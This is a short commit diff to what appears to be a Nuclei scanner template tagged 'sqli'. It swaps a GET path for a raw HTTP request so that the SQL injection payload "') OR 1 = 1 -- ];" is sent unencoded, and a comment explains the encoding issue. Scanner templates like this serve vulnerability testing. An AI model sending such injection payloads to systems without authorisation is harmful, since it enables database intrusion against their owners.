commit
42e055e104
|
@ -8,12 +8,13 @@ info:
|
|||
tags: sqli
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/') OR 1 = 1 -- ];"
|
||||
|
||||
# Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request
|
||||
# In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request
|
||||
- raw:
|
||||
- |
|
||||
GET /') OR 1 = 1 -- ];
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue